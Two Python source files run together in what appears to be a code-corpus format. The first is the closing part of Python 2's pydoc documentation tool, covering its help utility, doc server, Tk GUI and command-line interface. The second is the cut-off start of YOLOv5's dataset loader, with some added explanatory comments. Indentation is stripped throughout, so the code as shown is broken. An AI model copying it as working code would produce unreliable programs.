sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
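# Illustrative examples (editorial note): locate('os.path.join') imports os and os.path
# as needed and returns the join function; locate('len') fails to import a module and
# falls back to the __builtin__ lookup above, returning the built-in; locate('no.such.name')
# returns None.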
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
pager(title % desc + '\n\n' + text.document(object, name))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for file in os.listdir(dir):
path = os.path.join(dir, file)
if ispackage(path):
writedocs(path, pkgpath + file + '.', done)
elif os.path.isfile(path):
modname = inspect.getmodulename(path)
if modname:
if modname == '__init__':
modname = pkgpath[:-1] # remove trailing period
else:
modname = pkgpath + modname
if modname not in done:
done[modname] = 1
writedoc(modname)
class Helper:
keywords = {
'and': 'BOOLEAN',
'assert': ('ref/assert', ''),
'break': ('ref/break', 'while for'),
'class': ('ref/class', 'CLASSES SPECIALMETHODS'),
'continue': ('ref/continue', 'while for'),
'def': ('ref/function', ''),
'del': ('ref/del', 'BASICMETHODS'),
'elif': 'if',
'else': ('ref/if', 'while for'),
'except': 'try',
'exec': ('ref/exec', ''),
'finally': 'try',
'for': ('ref/for', 'break continue while'),
'from': 'import',
'global': ('ref/global', 'NAMESPACES'),
'if': ('ref/if', 'TRUTHVALUE'),
'import': ('ref/import', 'MODULES'),
'in': ('ref/comparisons', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('ref/lambdas', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('ref/pass', ''),
'print': ('ref/print', ''),
'raise': ('ref/raise', 'EXCEPTIONS'),
'return': ('ref/return', 'FUNCTIONS'),
'try': ('ref/try', 'EXCEPTIONS'),
'while': ('ref/while', 'break continue if TRUTHVALUE'),
'yield': ('ref/yield', ''),
}
topics = {
'TYPES': ('ref/types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('ref/strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'STRINGMETHODS': ('lib/string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('lib/typesseq-strings', 'OPERATORS'),
'UNICODE': ('ref/strings', 'encodings unicode SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'NUMBERS': ('ref/numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('ref/integers', 'int range'),
'FLOAT': ('ref/floating', 'float math'),
'COMPLEX': ('ref/imaginary', 'complex cmath'),
'SEQUENCES': ('lib/typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('lib/typesfunctions', 'def TYPES'),
'METHODS': ('lib/typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('lib/bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('lib/bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('lib/bltin-null-object', ''),
'ELLIPSIS': ('lib/bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('lib/bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('lib/specialattrs', ''),
'CLASSES': ('ref/types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('lib/typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('ref/summary', 'lambda or and not in is BOOLEAN COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('ref/objects', 'TYPES'),
'SPECIALMETHODS': ('ref/specialnames', 'BASICMETHODS ATTRIBUTEMETHODS CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('ref/customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('ref/attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('ref/callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('ref/sequence-types', 'SEQUENCES SEQUENCEMETHODS2 SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('ref/sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 SPECIALMETHODS'),
'MAPPINGMETHODS': ('ref/sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('ref/numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT SPECIALMETHODS'),
'EXECUTION': ('ref/execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('ref/naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('ref/dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('ref/exceptions', 'try except finally raise'),
'COERCIONS': ('ref/coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('ref/conversions', 'COERCIONS'),
'IDENTIFIERS': ('ref/identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('ref/id-classes', ''),
'PRIVATENAMES': ('ref/atom-identifiers', ''),
'LITERALS': ('ref/atom-literals', 'STRINGS BACKQUOTES NUMBERS TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('ref/exprlists', 'TUPLES LITERALS'),
'LISTS': ('lib/typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('ref/lists', 'LISTS LITERALS'),
'DICTIONARIES': ('lib/typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('ref/dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('ref/string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('ref/attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('ref/subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('ref/slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('ref/calls', 'EXPRESSIONS'),
'POWER': ('ref/power', 'EXPRESSIONS'),
'UNARY': ('ref/unary', 'EXPRESSIONS'),
'BINARY': ('ref/binary', 'EXPRESSIONS'),
'SHIFTING': ('ref/shifting', 'EXPRESSIONS'),
'BITWISE': ('ref/bitwise', 'EXPRESSIONS'),
'COMPARISON': ('ref/comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('ref/Booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('ref/assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('ref/augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('ref/compound', 'for while break continue'),
'TRUTHVALUE': ('lib/truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('lib/module-pdb', 'pdb'),
}
def __init__(self, input, output):
self.input = input
self.output = output
self.docdir = None
execdir = os.path.dirname(sys.executable)
homedir = os.environ.get('PYTHONHOME')
for dir in [os.environ.get('PYTHONDOCS'),
homedir and os.path.join(homedir, 'doc'),
os.path.join(execdir, 'doc'),
'/usr/doc/python-docs-' + split(sys.version)[0],
'/usr/doc/python-' + split(sys.version)[0],
'/usr/doc/python-docs-' + sys.version[:3],
'/usr/doc/python-' + sys.version[:3],
os.path.join(sys.prefix, 'Resources/English.lproj/Documentation')]:
if dir and os.path.isdir(os.path.join(dir, 'lib')):
self.docdir = dir
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
def __call__(self, request=None):
if request is not None:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ['q', 'quit']: break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://www.python.org/doc/tut/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic):
if not self.docdir:
self.output.write('''
Sorry, topic and keyword documentation is not available because the Python
HTML documentation files could not be found. If you have installed them,
please set the environment variable PYTHONDOCS to indicate their location.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target)
filename, xrefs = target
filename = self.docdir + '/' + filename + '.html'
try:
file = open(filename)
except:
self.output.write('could not read docs from %s\n' % filename)
return
divpat = re.compile('<div[^>]*navigat.*?</div.*?>', re.I | re.S)
addrpat = re.compile('<address.*?>.*?</address.*?>', re.I | re.S)
document = re.sub(addrpat, '', re.sub(divpat, '', file.read()))
file.close()
import htmllib, formatter, StringIO
buffer = StringIO.StringIO()
parser = htmllib.HTMLParser(
formatter.AbstractFormatter(formatter.DumbWriter(buffer)))
parser.start_table = parser.do_p
parser.end_table = lambda parser=parser: parser.do_p({})
parser.start_tr = parser.do_br
parser.start_td = parser.start_th = lambda a, b=buffer: b.write('\t')
parser.feed(document)
buffer = replace(buffer.getvalue(), '\xa0', ' ', '\n', '\n ')
pager(' ' + strip(buffer) + '\n')
if xrefs:
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
ModuleScanner().run(callback)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper(sys.stdin, sys.stdout)
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
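# Editorial note: Scanner.next() walks the tree depth-first with self.state as an explicit
# stack of (node, remaining_children) pairs; ModuleScanner below seeds it with
# (directory, package_prefix) roots so each call yields the next candidate module path.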
class ModuleScanner(Scanner):
"""An interruptible scanner that searches module synopses."""
def __init__(self):
roots = map(lambda dir: (dir, ''), pathdirs())
Scanner.__init__(self, roots, self.submodules, self.isnewpackage)
self.inodes = map(lambda (dir, pkg): os.stat(dir).st_ino, roots)
def submodules(self, (dir, package)):
children = []
for file in os.listdir(dir):
path = os.path.join(dir, file)
if ispackage(path):
children.append((path, package + (package and '.') + file))
else:
children.append((path, package))
children.sort() # so that spam.py comes before spam.pyc or spam.pyo
return children
def isnewpackage(self, (dir, package)):
inode = os.path.exists(dir) and os.stat(dir).st_ino
if not (os.path.islink(dir) and inode in self.inodes):
self.inodes.append(inode) # detect circular symbolic links
return ispackage(dir)
return False
def run(self, callback, key=None, completer=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
while not self.quit:
node = self.next()
if not node: break
path, package = node
modname = inspect.getmodulename(path)
if os.path.isfile(path) and modname:
modname = package + (package and '.') + modname
if not modname in seen:
seen[modname] = 1 # if we see spam.py, skip spam.pyc
if key is None:
callback(path, modname, '')
else:
desc = synopsis(path) or ''
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer: completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in pathdirs():
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
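# Editorial note: DocServer.serve_until_quit() polls the listening socket through select()
# with a one-second timeout, so setting server.quit = 1 from another thread (as gui() does
# below) stops the serving loop within about a second rather than blocking indefinitely
# inside handle_request().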
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
elif sys.platform == 'mac':
try: import ic
except ImportError: pass
else: ic.launchurl(url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default.
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (LOGGER, check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1)) # DDP
NUM_THREADS = min(8, max(1, os.cpu_count() - 1)) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
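# Editorial note: get_hash() is a cheap cache fingerprint, e.g. get_hash(image_files +
# label_files) folds the total on-disk size and the concatenated path strings into one
# md5 digest, so any added, removed, or resized file invalidates a previously written
# *.cache file. (image_files/label_files are illustrative names, not from this section.)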
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
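# Editorial note: for a photo stored as 4032x3024 pixels whose EXIF rotation tag is 6 or 8
# (camera held sideways), exif_size() reports the display size (3024, 4032); any failure
# while reading EXIF silently falls back to the raw PIL size.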
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
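# Illustrative sketch (editorial, not part of the original file): applying exif_transpose()
# right after opening an image with PIL so the pixel data matches the EXIF Orientation tag.
# The helper name and path argument are assumptions for illustration only.
def _open_oriented_image(path):  # hypothetical helper
    im = Image.open(path)        # may carry an EXIF Orientation tag
    return exif_transpose(im)    # correctly oriented image, Orientation tag cleared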
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
